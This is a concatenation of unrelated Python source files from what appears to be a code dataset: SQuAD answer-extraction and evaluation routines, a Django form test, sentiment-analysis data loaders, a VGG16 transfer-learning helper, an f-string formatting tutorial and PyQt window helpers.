                    if not feature.token_is_max_context.get(start_index, False):
                        continue
                    if end_index < start_index:
                        continue
                    length = end_index - start_index + 1
                    if length > max_answer_length:
                        continue
                    prelim_predictions.append(
                        _PrelimPrediction(
                            feature_index=feature_index,
                            start_index=start_index,
                            end_index=end_index,
                            start_logit=result.start_logits[start_index],
                            end_logit=result.end_logits[end_index],
                        )
                    )

        if version_2_with_negative:
            prelim_predictions.append(
                _PrelimPrediction(
                    feature_index=min_null_feature_index,
                    start_index=0,
                    end_index=0,
                    start_logit=null_start_logit,
                    end_logit=null_end_logit,
                )
            )
        # rank candidates by combined start+end logit, best first
        prelim_predictions = sorted(
            prelim_predictions,
            key=lambda x: (x.start_logit + x.end_logit),
            reverse=True,
        )

        _NbestPrediction = collections.namedtuple(  # pylint: disable=invalid-name
            "NbestPrediction", ["text", "start_logit", "end_logit"]
        )

        seen_predictions = {}
        nbest = []
        for pred in prelim_predictions:
            if len(nbest) >= n_best_size:
                break
            if pred.start_index > 0:  # this is a non-null prediction
                feature = features[pred.feature_index]
                tok_tokens = feature.tokens[pred.start_index : (pred.end_index + 1)]
                orig_doc_start = feature.token_to_orig_map[pred.start_index]
                orig_doc_end = feature.token_to_orig_map[pred.end_index]
                orig_tokens = example.doc_tokens[orig_doc_start : (orig_doc_end + 1)]
                tok_text = " ".join(tok_tokens)

                # De-tokenize WordPieces that have been split off.
                tok_text = tok_text.replace(" ##", "")
                tok_text = tok_text.replace("##", "")

                # Clean whitespace
                tok_text = tok_text.strip()
                tok_text = " ".join(tok_text.split())
                orig_text = " ".join(orig_tokens)

                # get_final_text is defined elsewhere in this module (maps the
                # tokenized span back onto the original document text)
                final_text = get_final_text(
                    tok_text, orig_text, do_lower_case, verbose_logging
                )
                if final_text in seen_predictions:
                    continue

                seen_predictions[final_text] = True
            else:
                final_text = ""
                seen_predictions[final_text] = True

            nbest.append(
                _NbestPrediction(
                    text=final_text,
                    start_logit=pred.start_logit,
                    end_logit=pred.end_logit,
                )
            )

        # if we didn't include the empty option in the n-best, include it
        if version_2_with_negative:
            if "" not in seen_predictions:
                nbest.append(
                    _NbestPrediction(
                        text="", start_logit=null_start_logit, end_logit=null_end_logit
                    )
                )

            # In very rare edge cases we could only have single null prediction.
            # So we just create a nonce prediction in this case to avoid failure.
            if len(nbest) == 1:
                nbest.insert(
                    0, _NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0)
                )

        # In very rare edge cases we could have no valid predictions. So we
        # just create a nonce prediction in this case to avoid failure.
        if not nbest:
            nbest.append(_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))

        assert len(nbest) >= 1

        total_scores = []
        best_non_null_entry = None
        for entry in nbest:
            total_scores.append(entry.start_logit + entry.end_logit)
            if not best_non_null_entry:
                if entry.text:
                    best_non_null_entry = entry

        probs = _compute_softmax(total_scores)

        nbest_json = []
        for (i, entry) in enumerate(nbest):
            output = collections.OrderedDict()
            output["text"] = entry.text
            output["probability"] = probs[i]
            output["start_logit"] = entry.start_logit
            output["end_logit"] = entry.end_logit
            nbest_json.append(output)

        assert len(nbest_json) >= 1

        if not version_2_with_negative:
            all_predictions[example.qas_id] = nbest_json[0]["text"]
        else:
            # predict "" iff the null score - the score of best non-null > threshold
            score_diff = (
                score_null
                - best_non_null_entry.start_logit
                - (best_non_null_entry.end_logit)
            )
            scores_diff_json[example.qas_id] = score_diff
            if score_diff > null_score_diff_threshold:
                all_predictions[example.qas_id] = ""
            else:
                all_predictions[example.qas_id] = best_non_null_entry.text

        all_nbest_json[example.qas_id] = nbest_json

    # Only the per-question n-best lists are returned; all_predictions and
    # scores_diff_json are computed but not exposed by this function.
    all_best = [
        {
            "id": id,
            "answer": [answer["text"] for answer in answers],
            "probability": [answer["probability"] for answer in answers],
        }
        for id, answers in all_nbest_json.items()
    ]
    return all_best
def write_predictions(
    all_examples,
    all_features,
    all_results,
    n_best_size,
    max_answer_length,
    do_lower_case,
    output_prediction_file,
    output_nbest_file,
    output_null_log_odds_file,
    verbose_logging,
    version_2_with_negative,
    null_score_diff_threshold,
):
    """Write final predictions to the json file and log-odds of null if needed.

    For each example, merges the per-feature (document-span) model results,
    keeps the `n_best_size` highest-scoring valid spans, projects them back to
    the original text, and writes three JSON files: best answer per question,
    full n-best lists, and (SQuAD v2 only) the null-vs-best score margins.

    Returns:
        (all_predictions, all_nbest_json, scores_diff_json) as OrderedDicts
        keyed by `example.qas_id`.
    """
    # logger.info("Writing predictions to: %s" % (output_prediction_file))
    # logger.info("Writing nbest to: %s" % (output_nbest_file))
    # One example (question) may be split into several features (doc spans).
    example_index_to_features = collections.defaultdict(list)
    for feature in all_features:
        example_index_to_features[feature.example_index].append(feature)
    unique_id_to_result = {}
    for result in all_results:
        unique_id_to_result[result.unique_id] = result
    _PrelimPrediction = collections.namedtuple(  # pylint: disable=invalid-name
        "PrelimPrediction",
        ["feature_index", "start_index", "end_index", "start_logit", "end_logit"],
    )
    all_predictions = collections.OrderedDict()
    all_nbest_json = collections.OrderedDict()
    scores_diff_json = collections.OrderedDict()
    for (example_index, example) in enumerate(all_examples):
        features = example_index_to_features[example_index]
        prelim_predictions = []
        # keep track of the minimum score of null start+end of position 0
        score_null = 1000000  # large and positive
        min_null_feature_index = 0  # the paragraph slice with min null score
        null_start_logit = 0  # the start logit at the slice with min null score
        null_end_logit = 0  # the end logit at the slice with min null score
        for (feature_index, feature) in enumerate(features):
            result = unique_id_to_result[feature.unique_id]
            start_indexes = _get_best_indexes(result.start_logits, n_best_size)
            end_indexes = _get_best_indexes(result.end_logits, n_best_size)
            # if we could have irrelevant answers, get the min score of irrelevant
            if version_2_with_negative:
                # Position 0 is the [CLS] token; its logits score the "no answer" case.
                feature_null_score = result.start_logits[0] + result.end_logits[0]
                if feature_null_score < score_null:
                    score_null = feature_null_score
                    min_null_feature_index = feature_index
                    null_start_logit = result.start_logits[0]
                    null_end_logit = result.end_logits[0]
            for start_index in start_indexes:
                for end_index in end_indexes:
                    # We could hypothetically create invalid predictions, e.g., predict
                    # that the start of the span is in the question. We throw out all
                    # invalid predictions.
                    if start_index >= len(feature.tokens):
                        continue
                    if end_index >= len(feature.tokens):
                        continue
                    if start_index not in feature.token_to_orig_map:
                        continue
                    if end_index not in feature.token_to_orig_map:
                        continue
                    if not feature.token_is_max_context.get(start_index, False):
                        continue
                    if end_index < start_index:
                        continue
                    length = end_index - start_index + 1
                    if length > max_answer_length:
                        continue
                    prelim_predictions.append(
                        _PrelimPrediction(
                            feature_index=feature_index,
                            start_index=start_index,
                            end_index=end_index,
                            start_logit=result.start_logits[start_index],
                            end_logit=result.end_logits[end_index],
                        )
                    )
        if version_2_with_negative:
            prelim_predictions.append(
                _PrelimPrediction(
                    feature_index=min_null_feature_index,
                    start_index=0,
                    end_index=0,
                    start_logit=null_start_logit,
                    end_logit=null_end_logit,
                )
            )
        prelim_predictions = sorted(
            prelim_predictions,
            key=lambda x: (x.start_logit + x.end_logit),
            reverse=True,
        )
        _NbestPrediction = collections.namedtuple(  # pylint: disable=invalid-name
            "NbestPrediction", ["text", "start_logit", "end_logit"]
        )
        seen_predictions = {}
        nbest = []
        for pred in prelim_predictions:
            if len(nbest) >= n_best_size:
                break
            if pred.start_index > 0:  # this is a non-null prediction
                feature = features[pred.feature_index]
                tok_tokens = feature.tokens[pred.start_index : (pred.end_index + 1)]
                orig_doc_start = feature.token_to_orig_map[pred.start_index]
                orig_doc_end = feature.token_to_orig_map[pred.end_index]
                orig_tokens = example.doc_tokens[orig_doc_start : (orig_doc_end + 1)]
                tok_text = " ".join(tok_tokens)
                # De-tokenize WordPieces that have been split off.
                tok_text = tok_text.replace(" ##", "")
                tok_text = tok_text.replace("##", "")
                # Clean whitespace
                tok_text = tok_text.strip()
                tok_text = " ".join(tok_text.split())
                orig_text = " ".join(orig_tokens)
                final_text = get_final_text(
                    tok_text, orig_text, do_lower_case, verbose_logging
                )
                if final_text in seen_predictions:
                    continue
                seen_predictions[final_text] = True
            else:
                final_text = ""
                seen_predictions[final_text] = True
            nbest.append(
                _NbestPrediction(
                    text=final_text,
                    start_logit=pred.start_logit,
                    end_logit=pred.end_logit,
                )
            )
        # if we didn't include the empty option in the n-best, include it
        if version_2_with_negative:
            if "" not in seen_predictions:
                nbest.append(
                    _NbestPrediction(
                        text="", start_logit=null_start_logit, end_logit=null_end_logit
                    )
                )
            # In very rare edge cases we could only have single null prediction.
            # So we just create a nonce prediction in this case to avoid failure.
            if len(nbest) == 1:
                nbest.insert(
                    0, _NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0)
                )
        # In very rare edge cases we could have no valid predictions. So we
        # just create a nonce prediction in this case to avoid failure.
        if not nbest:
            nbest.append(_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
        assert len(nbest) >= 1
        total_scores = []
        best_non_null_entry = None
        for entry in nbest:
            total_scores.append(entry.start_logit + entry.end_logit)
            if not best_non_null_entry:
                if entry.text:
                    best_non_null_entry = entry
        probs = _compute_softmax(total_scores)
        nbest_json = []
        for (i, entry) in enumerate(nbest):
            output = collections.OrderedDict()
            output["text"] = entry.text
            output["probability"] = probs[i]
            output["start_logit"] = entry.start_logit
            output["end_logit"] = entry.end_logit
            nbest_json.append(output)
        assert len(nbest_json) >= 1
        if not version_2_with_negative:
            all_predictions[example.qas_id] = nbest_json[0]["text"]
        else:
            # predict "" iff the null score - the score of best non-null > threshold
            score_diff = (
                score_null
                - best_non_null_entry.start_logit
                - (best_non_null_entry.end_logit)
            )
            scores_diff_json[example.qas_id] = score_diff
            if score_diff > null_score_diff_threshold:
                all_predictions[example.qas_id] = ""
            else:
                all_predictions[example.qas_id] = best_non_null_entry.text
        all_nbest_json[example.qas_id] = nbest_json
    with open(output_prediction_file, "w") as writer:
        writer.write(json.dumps(all_predictions, indent=4) + "\n")
    with open(output_nbest_file, "w") as writer:
        writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
    if version_2_with_negative:
        with open(output_null_log_odds_file, "w") as writer:
            writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
    return all_predictions, all_nbest_json, scores_diff_json
def get_final_text(pred_text, orig_text, do_lower_case, verbose_logging=False):
    """Project the tokenized prediction back to the original text.

    Args:
        pred_text: detokenized WordPiece prediction (already normalized).
        orig_text: span of the original (whitespace-tokenized) document text.
        do_lower_case: must match the tokenizer setting used for the model.
        verbose_logging: unused in this copy; kept for interface compatibility.

    Returns:
        The answer span with original casing/punctuation, or `orig_text`
        whenever the character-alignment heuristic fails.
    """
    # When we created the data, we kept track of the alignment between original
    # (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
    # now `orig_text` contains the span of our original text corresponding to the
    # span that we predicted.
    #
    # However, `orig_text` may contain extra characters that we don't want in
    # our prediction.
    #
    # For example, let's say:
    #   pred_text = steve smith
    #   orig_text = Steve Smith's
    #
    # We don't want to return `orig_text` because it contains the extra "'s".
    #
    # We don't want to return `pred_text` because it's already been normalized
    # (the SQuAD eval script also does punctuation stripping/lower casing but
    # our tokenizer does additional normalization like stripping accent
    # characters).
    #
    # What we really want to return is "Steve Smith".
    #
    # Therefore, we have to apply a semi-complicated alignment heuristic between
    # `pred_text` and `orig_text` to get a character-to-character alignment. This
    # can fail in certain cases in which case we just return `orig_text`.
    def _strip_spaces(text):
        # Returns (text without spaces, map from stripped index -> original index).
        ns_chars = []
        ns_to_s_map = collections.OrderedDict()
        for (i, c) in enumerate(text):
            if c == " ":
                continue
            ns_to_s_map[len(ns_chars)] = i
            ns_chars.append(c)
        ns_text = "".join(ns_chars)
        return (ns_text, ns_to_s_map)
    # We first tokenize `orig_text`, strip whitespace from the result
    # and `pred_text`, and check if they are the same length. If they are
    # NOT the same length, the heuristic has failed. If they are the same
    # length, we assume the characters are one-to-one aligned.
    tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
    tok_text = " ".join(tokenizer.tokenize(orig_text))
    start_position = tok_text.find(pred_text)
    if start_position == -1:
        return orig_text
    end_position = start_position + len(pred_text) - 1
    (orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
    (tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
    if len(orig_ns_text) != len(tok_ns_text):
        return orig_text
    # We then project the characters in `pred_text` back to `orig_text` using
    # the character-to-character alignment.
    tok_s_to_ns_map = {}
    for (i, tok_index) in tok_ns_to_s_map.items():
        tok_s_to_ns_map[tok_index] = i
    orig_start_position = None
    if start_position in tok_s_to_ns_map:
        ns_start_position = tok_s_to_ns_map[start_position]
        if ns_start_position in orig_ns_to_s_map:
            orig_start_position = orig_ns_to_s_map[ns_start_position]
    if orig_start_position is None:
        return orig_text
    orig_end_position = None
    if end_position in tok_s_to_ns_map:
        ns_end_position = tok_s_to_ns_map[end_position]
        if ns_end_position in orig_ns_to_s_map:
            orig_end_position = orig_ns_to_s_map[ns_end_position]
    if orig_end_position is None:
        return orig_text
    output_text = orig_text[orig_start_position : (orig_end_position + 1)]
    return output_text
def lcs(S, T):
    """Return the set of longest common substrings of S and T.

    Classic O(len(S) * len(T)) dynamic program: table[i+1][j+1] holds the
    length of the common suffix ending at S[i] / T[j]. Returns an empty set
    when the strings share no characters.
    """
    rows, cols = len(S), len(T)
    table = [[0] * (cols + 1) for _ in range(rows + 1)]
    best_len = 0
    best = set()
    for i, s_ch in enumerate(S):
        for j, t_ch in enumerate(T):
            if s_ch != t_ch:
                continue
            length = table[i][j] + 1
            table[i + 1][j + 1] = length
            if length > best_len:
                best_len = length
                best = {S[i - length + 1 : i + 1]}
            elif length == best_len:
                best.add(S[i - length + 1 : i + 1])
    return best
def evaluate_results(text):
    """Summarise span-extraction quality from bucketed predictions.

    Args:
        text: dict with keys "correct_text", "similar_text" and
            "incorrect_text"; each maps item names (containing "span" or
            "impossible") to {"truth": ..., "predicted": ...} records.

    Returns:
        A multi-line report string: exact/partial/no-match rates and LCS/SQuAD
        F1 for positive samples, plus an F1 score for the negative
        ("impossible") samples.
    """
    partial_match_scores = []
    lcs_all = []
    impos1, impos2, impos3, impos4 = 0, 0, 0, 0
    pos1, pos2, pos3 = 0, 0, 0
    fscores, squad_fscores = [], []
    for i, key in enumerate(["correct_text", "similar_text", "incorrect_text"]):
        for item in text[key]:
            entry = text[key][item]
            if i == 0:
                if "impossible" in item and entry["predicted"] == "":
                    impos1 += 1
                elif "span" in item:
                    pos1 += 1
                    fscores.append(1)
                    squad_fscores.append(1)
            elif i == 1:
                if "impossible" in item:
                    impos2 += 1
                elif "span" in item:
                    if entry["predicted"] != "":
                        longest_match = list(lcs(entry["truth"], entry["predicted"]))[0]
                        lcs_all.append(longest_match)
                        partial_match_scores.append(
                            round(
                                len(longest_match.split()) / len(entry["truth"].split()), 4
                            )
                        )
                        pos2 += 1
                        r = len(longest_match.split()) / len(entry["truth"].split())
                        p = len(longest_match.split()) / len(entry["predicted"].split())
                        f = 2 * p * r / (p + r)
                        fscores.append(f)
                        squad_fscores.append(compute_f1(entry["truth"], entry["predicted"]))
                    else:
                        pos3 += 1
                        impos4 += 1
                        fscores.append(0)
                        squad_fscores.append(0)
            elif i == 2:
                # BUG FIX: the original read the stale loop variable `z` from the
                # i == 1 branch here, which raised NameError (or miscounted) when
                # no "similar_text" span had been processed first.
                if "impossible" in item:
                    impos3 += 1
                elif "span" in item:
                    if entry["predicted"] == "":
                        impos4 += 1
                    pos3 += 1
                    fscores.append(0)
                    squad_fscores.append(0)
    total_pos = pos1 + pos2 + pos3
    # NOTE(review): these ratios raise ZeroDivisionError on degenerate inputs
    # (no positive samples or no "impossible" samples); behaviour kept as-is.
    imr = impos2 / (impos2 + impos3)
    imp = impos2 / (impos2 + impos4)
    imf = 2 * imp * imr / (imp + imr)
    p1 = "Positive Samples:"  # typo fix: was "Postive Samples:"
    p2 = "Exact Match: {}/{} = {}%".format(
        pos1, total_pos, round(100 * pos1 / total_pos, 2)
    )
    p3 = "Partial Match: {}/{} = {}%".format(
        pos2, total_pos, round(100 * pos2 / total_pos, 2)
    )
    p4a = "LCS F1 Score = {}%".format(round(100 * np.mean(fscores), 2))
    p4b = "SQuAD F1 Score = {}%".format(round(100 * np.mean(squad_fscores), 2))
    p5 = "No Match: {}/{} = {}%".format(
        pos3, total_pos, round(100 * pos3 / total_pos, 2)
    )
    p6 = "\nNegative Samples"
    p7 = "Inv F1 Score = {}%".format(round(100 * imf, 2))
    # p7a = 'Inv Recall: {}/{} = {}%'.format(impos2, impos2+impos3, round(100*imr, 2))
    # p7b = 'Inv Precision: {}/{} = {}%'.format(impos2, impos2+impos4, round(100*imp, 2))
    p = "\n".join([p1, p2, p3, p4a, p4b, p5, p6, p7])
    return p
| StarcoderdataPython |
6695429 | <reponame>cu-library/mellyn<filename>agreements/test_forms.py<gh_stars>0
"""
This module defines tests to run against the fields module.
https://docs.djangoproject.com/en/3.0/topics/testing/
"""
from datetime import datetime, timezone
from django.test import TestCase
from .forms import AgreementBaseForm
class AgreementBaseFormTestCase(TestCase):
    """Tests for the AgreementBaseForm."""

    def test_agreementbaseform_clean(self):
        """Test that the end date can't be before the start date"""
        error = '"End" date and time is before "Start" date and time.'
        cases = [
            # (start, end, error expected?)
            (datetime(1994, 6, 9, tzinfo=timezone.utc),
             datetime(1963, 6, 19, tzinfo=timezone.utc), True),
            (datetime(1999, 12, 31, tzinfo=timezone.utc),
             datetime(2000, 1, 1, tzinfo=timezone.utc), False),
            (datetime(1999, 12, 31, tzinfo=timezone.utc), None, False),
        ]
        for start, end, expect_error in cases:
            form = AgreementBaseForm()
            form.cleaned_data = {'start': start, 'end': end}
            form.clean()
            if expect_error:
                self.assertIn(error, form.non_field_errors())
            else:
                self.assertNotIn(error, form.non_field_errors())
| StarcoderdataPython |
import unittest
from kbmodpy import kbmod as kb
class test_import(unittest.TestCase):
    """Placeholder test case for the kbmod import; real assertions are TODO."""

    def setUp(self):
        # TODO: initialise kbmod fixtures (via `kb`) once real tests exist.
        pass

    def test_something(self):
        # TODO: add real assertions, e.g. self.assertEqual(a, b).
        pass
| StarcoderdataPython |
20804 | # encoding: utf8
import numpy as np
import pandas as pd
from collections import OrderedDict
from senti_analysis import config
from senti_analysis import constants
from senti_analysis.preprocess import (load_tokenizer, load_sentences,
encode_sentence, label_transform)
def load_data_set():
    """
    Load data set.
    :return: train_data_set, validation_data_set, test_data_set
    """
    paths = (config.TRAIN_SET_PATH, config.VALIDATION_SET_PATH, config.TEST_SET_PATH)
    return tuple(pd.read_csv(path) for path in paths)
def x_data():
    """Encode the train/validation sentences into padded id sequences.

    :return: (x_train, x_val) encoded with the shared tokenizer and padded
        to config.MAX_SEQUENCE_LENGTH.
    """
    # NOTE: the original also read the train/validation CSVs here but never
    # used them -- the redundant I/O has been removed.
    tokenizer = load_tokenizer()
    train_sentences, val_sentences, _test_sentences = load_sentences()
    x_train = encode_sentence(train_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
                              tokenizer=tokenizer)
    x_val = encode_sentence(val_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
                            tokenizer=tokenizer)
    return x_train, x_val
def load_val_data_set():
    """Build the validation inputs and labels.

    :return: (x_val, y_val) -- encoded/padded validation sentences and an
        OrderedDict of per-column label arrays from transform_y_data().
    """
    tokenizer = load_tokenizer()
    _train_sentences, val_sentences, _test_sentences = load_sentences()
    x_val = encode_sentence(val_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
                            tokenizer=tokenizer)
    # NOTE: the original read the validation CSV twice; the unused first
    # read has been removed.
    train_set = pd.read_csv(config.TRAIN_SET_PATH)
    val_set = pd.read_csv(config.VALIDATION_SET_PATH)
    _, y_val = transform_y_data(train_set, val_set, constants.COLS)
    return x_val, y_val
def transform_y_data(train_set, val_set, cols):
    """Transform the label columns of both data frames into numpy arrays.

    :return: (y_train, y_val) OrderedDicts mapping column name -> np.array.
    """
    y_train = OrderedDict((col, np.array(label_transform(train_set[col]))) for col in cols)
    y_val = OrderedDict((col, np.array(label_transform(val_set[col]))) for col in cols)
    return y_train, y_val
def y_data():
    """
    generate y label data.
    :return: train_label_data dict, validation_label_data dict
    """
    train_frame = pd.read_csv(config.TRAIN_SET_PATH)
    val_frame = pd.read_csv(config.VALIDATION_SET_PATH)
    return transform_y_data(train_frame, val_frame, constants.COLS)
def validate_data():
    """Build validation inputs and a plain dict of per-column label arrays.

    :return: (x_val, y_val)
    """
    val_frame = pd.read_csv(config.VALIDATION_SET_PATH)
    tokenizer = load_tokenizer()
    _train_sentences, val_sentences, _test_sentences = load_sentences()
    x_val = encode_sentence(val_sentences, padding=True,
                            max_length=config.MAX_SEQUENCE_LENGTH, tokenizer=tokenizer)
    y_val = {col: np.array(label_transform(val_frame[col])) for col in constants.COLS}
    return x_val, y_val
| StarcoderdataPython |
1733354 | <filename>src/utils/models.py
import tensorflow as tf
import os
import logging
def get_VGG_16_model(input_shape, model_path):
    """Download the ImageNet-pretrained VGG16 convolutional base (no top),
    save it to `model_path`, and return it."""
    base_model = tf.keras.applications.vgg16.VGG16(
        input_shape=input_shape,
        weights="imagenet",
        include_top=False,
    )
    base_model.save(model_path)
    logging.info(f"VGG16 base model saved at: {model_path} ")
    return base_model
def prepare_model(model, CLASSES, freeze_all, freeze_till, learning_rate):
    """Attach a softmax head to a base model, freeze layers, and compile.

    Args:
        model: base (convolutional) Keras model to extend.
        CLASSES: number of output classes for the softmax head.
        freeze_all: if True, freeze every base layer.
        freeze_till: if set (> 1), freeze all but the last `freeze_till` layers.
        learning_rate: SGD learning rate.

    Returns:
        The compiled full model (base + flatten + dense softmax head).
    """
    if freeze_all:
        for layer in model.layers:
            layer.trainable = False
    elif (freeze_till is not None) and (freeze_till > 1):
        for layer in model.layers[:-freeze_till]:
            layer.trainable = False
    # add our fully connected layers
    flatten_in = tf.keras.layers.Flatten()(model.output)
    prediction = tf.keras.layers.Dense(
        units=CLASSES,
        activation="softmax"
    )(flatten_in)
    full_model = tf.keras.models.Model(
        inputs=model.input,
        outputs=prediction
    )
    full_model.compile(
        optimizer=tf.keras.optimizers.SGD(learning_rate=learning_rate),
        loss=tf.keras.losses.CategoricalCrossentropy(),
        metrics=["accuracy"]
    )
    logging.info("custom model is compiled and ready to be trained")
    full_model.summary()
    # BUG FIX: the original returned the unprepared base `model` instead of
    # the compiled `full_model` it had just built.
    return full_model
a = 123
# Demo script: str.format() vs f-strings, and the format mini-language.
b = 'abc'
# --- positional/keyword .format() and the equivalent f-string spellings ---
print('{} and {}'.format(a, b))
# 123 and abc
print('{first} and {second}'.format(first=a, second=b))
# 123 and abc
print(f'{a} and {b}')
# 123 and abc
print(F'{a} and {b}')
# 123 and abc
print(f"{a} and {b}")
# 123 and abc
print(f'''{a} and {b}''')
# 123 and abc
print(f"""{a} and {b}""")
# 123 and abc
# --- alignment and fill characters ---
s = 'abc'
print(f'right : {s:_>8}')
print(f'center: {s:_^8}')
print(f'left : {s:_<8}')
# right : _____abc
# center: __abc___
# left : abc_____
# --- integer formatting: zero padding, thousands separator, radixes ---
i = 1234
print(f'zero padding: {i:08}')
# zero padding: 00001234
print(f'comma: {i:,}')
# comma: 1,234
print(f'bin: {i:b}')
print(f'oct: {i:o}')
print(f'hex: {i:x}')
# bin: 10011010010
# oct: 2322
# hex: 4d2
print(f'bin: {i:#b}')
print(f'oct: {i:#o}')
print(f'hex: {i:#x}')
# bin: 0b10011010010
# oct: 0o2322
# hex: 0x4d2
# --- float formatting: fixed, significant digits, exponent, percent ---
f = 12.3456
print(f'digit(decimal): {f:.3f}')
print(f'digit(all) : {f:.3g}')
# digit(decimal): 12.346
# digit(all) : 12.3
print(f'exponent: {f:.3e}')
# exponent: 1.235e+01
f = 0.123
print(f'percent: {f:.2%}')
# percent: 12.30%
# --- literal braces are escaped by doubling ---
n = 123
print(f'{{}}-{n}-{{{n}}}')
# {}-123-{123}
# --- nested fields: the width itself comes from a variable ---
n = 123
i = 8
print('{n:0{i}}'.format(n=n, i=i))
# 00000123
print(f'{n:0{i}}')
# 00000123
f = 1.2345
for i in range(5):
    print(f'{f:.{i}f}')
# 1
# 1.2
# 1.23
# 1.234
# 1.2345
# --- raw strings and raw f-strings (rf / fr) ---
print('x\ty')
# x y
print(r'x\ty')
# x\ty
x = 'XXX'
y = 'YYY'
print(f'{x}\t{y}')
# XXX YYY
print(rf'{x}\t{y}')
# XXX\tYYY
print(fr'{x}\t{y}')
# XXX\tYYY
# --- expressions inside f-string replacement fields ---
a = 3
b = 4
# print('{a} + {b} = {a + b}'.format(a=a, b=b))
# KeyError: 'a + b'
print(f'{a} + {b} = {a + b}')
# 3 + 4 = 7
print(f'{a} * {b} = {a * b}')
# 3 * 4 = 12
print(f'{a} / {b} = {a / b:.2e}')
# 3 / 4 = 7.50e-01
# --- dict access: .format() index syntax vs f-string subscription ---
d = {'key1': 3, 'key2': 4}
print('{0[key1]}, {0[key2]}'.format(d))
# 3, 4
# print('{0["key1"]}, {0["key2"]}'.format(d))
# KeyError: '"key1"'
print(f'{d["key1"]}, {d["key2"]}')
# 3, 4
# print(f'{d[key1]}, {d[key2]}')
# NameError: name 'key1' is not defined
# print(f'{d['key1']}, {d['key2']}')
# SyntaxError: invalid syntax
print(f"{d['key1']}, {d['key2']}")
# 3, 4
# print(f'{d[\'key1\']}, {d[\'key2\']}')
# SyntaxError: f-string expression part cannot include a backslash
# --- self-documenting expressions, '=' specifier (Python 3.8+) ---
i = 123
print(f'{i=}')
# i=123
print(f'{i = }')
# i = 123
print(f'{ i = }')
# i = 123
print(f'{i = :#b}')
# i = 0b1111011
print(f'{i * 2 = }')
# i * 2 = 246
l = [0, 1, 2]
print(f'{l = }, {l[0] = }')
# l = [0, 1, 2], l[0] = 0
d = {'key1': 3, 'key2': 4}
print(f'{d = }, {d["key1"] = }')
# d = {'key1': 3, 'key2': 4}, d["key1"] = 3
| StarcoderdataPython |
250745 | ## CA
from Load_config_GUI import Ui_Load
from Adv_params_GUI import Ui_Adv_Params
class Ui_CA(object):
    def load_folder_name(self):
        """
        Initializes the 'Load config file' window

        Returns
        ------
        string : the loaded filename
        """
        loader_widget = QtWidgets.QWidget()
        # Keep a reference on self (presumably to stop Qt garbage-collecting
        # the window -- confirm against the other Ui_* classes).
        self.window = loader_widget
        self.Load = Ui_Load()
        return self.Load.setupUi_save(loader_widget)

    def AP_window(self):
        """
        Initializes the 'Advanced parameters' window

        Returns
        ------
        AP : the Ui_Adv_Params object
        window : QtWidgets.QMainWindow object
        """
        params_window = QtWidgets.QMainWindow()
        self.window = params_window
        self.AP = Ui_Adv_Params()
        self.AP.setupUi(params_window)
        params_window.show()
        return self.AP, params_window
## CV
from Load_config_GUI import Ui_Load # more
from Adv_params_GUI import Ui_Adv_Params
class Ui_CV(object):
    """GUI helper for the CV experiment windows."""

    def load_folder_name(self):
        """
        Initializes the 'Load config file' window

        Returns
        ------
        string : the loaded filename

        (DOC FIX: this docstring previously sat on the class instead of on
        this method, leaving the method undocumented.)
        """
        self.window = QtWidgets.QWidget()
        self.Load = Ui_Load()
        return self.Load.setupUi_save(self.window)

    def AP_window(self):
        """
        Initializes the 'Advanced parameters' window

        Returns
        ------
        AP : the Ui_Adv_Params object
        window : QtWidgets.QMainWindow object
        """
        self.window = QtWidgets.QMainWindow()
        self.AP = Ui_Adv_Params()
        self.AP.setupUi(self.window)
        self.window.show()
        return self.AP, self.window
## LSV
class Ui_LSV(object):
    def load_folder_name(self):
        """
        Initializes the 'Load config file' window

        Returns
        ------
        string : the loaded filename
        """
        loader_widget = QtWidgets.QWidget()
        self.window = loader_widget
        self.Load = Ui_Load()
        return self.Load.setupUi_save(loader_widget)

    def AP_window(self):
        """
        Initializes the 'Advanced parameters' window

        Returns
        ------
        AP : the Ui_Adv_Params object
        window : QtWidgets.QMainWindow object
        """
        params_window = QtWidgets.QMainWindow()
        self.window = params_window
        self.AP = Ui_Adv_Params()
        self.AP.setupUi(params_window)
        params_window.show()
        return self.AP, params_window
## main
from LSV_GUI import Ui_LSV
from CV_GUI import Ui_CV
from CA_GUI import Ui_CA
from Load_config_GUI import Ui_Load
from Exp_type_GUI import Ui_Experiment
class Ui_MainWindow(object):
    def show_exp(self):
        """
        Initializes the 'Experiment Type' window

        Returns
        ------
        exp: the Ui_Experiment object
        """
        dialog = QtWidgets.QDialog()
        # Keep a reference on self (presumably to stop Qt garbage-collecting
        # the window while it is shown).
        self.window = dialog
        self.exp = Ui_Experiment()
        self.exp.setupUi(dialog)
        dialog.show()
        return self.exp

    def show_LSVwindow(self):
        """
        Initializes the 'LSV' window

        Returns
        ------
        LSV: the Ui_LSV object
        window : the LSV QMainWindow object
        """
        lsv_window = QtWidgets.QMainWindow()
        self.window = lsv_window
        self.LSV = Ui_LSV()
        self.LSV.setupUi(lsv_window)
        lsv_window.show()
        return self.LSV, lsv_window

    def show_CVwindow(self):
        """
        Initializes the 'CV' window

        Returns
        ------
        CV: the Ui_CV object
        window : the CV QMainWindow object
        """
        cv_window = QtWidgets.QMainWindow()
        self.window = cv_window
        self.CV = Ui_CV()
        self.CV.setupUi(cv_window)
        cv_window.show()
        return self.CV, cv_window

    def show_CAwindow(self):
        """
        Initializes the 'CA' window

        Returns
        ------
        CA: the Ui_CA object
        window : the CA QMainWindow object
        """
        ca_window = QtWidgets.QMainWindow()
        self.window = ca_window
        self.CA = Ui_CA()
        self.CA.setupUi(ca_window)
        ca_window.show()
        return self.CA, ca_window

    def load_config(self):
        """
        Initializes the 'Load config file' window

        Returns
        ------
        string: the loaded filename
        """
        loader_widget = QtWidgets.QWidget()
        self.window = loader_widget
        self.Load = Ui_Load()
        return self.Load.setupUi(loader_widget)
from modeltranslation.translator import translator, TranslationOptions
from events.models import Category, EventTemplate
class CategoryTranslationOptions(TranslationOptions):
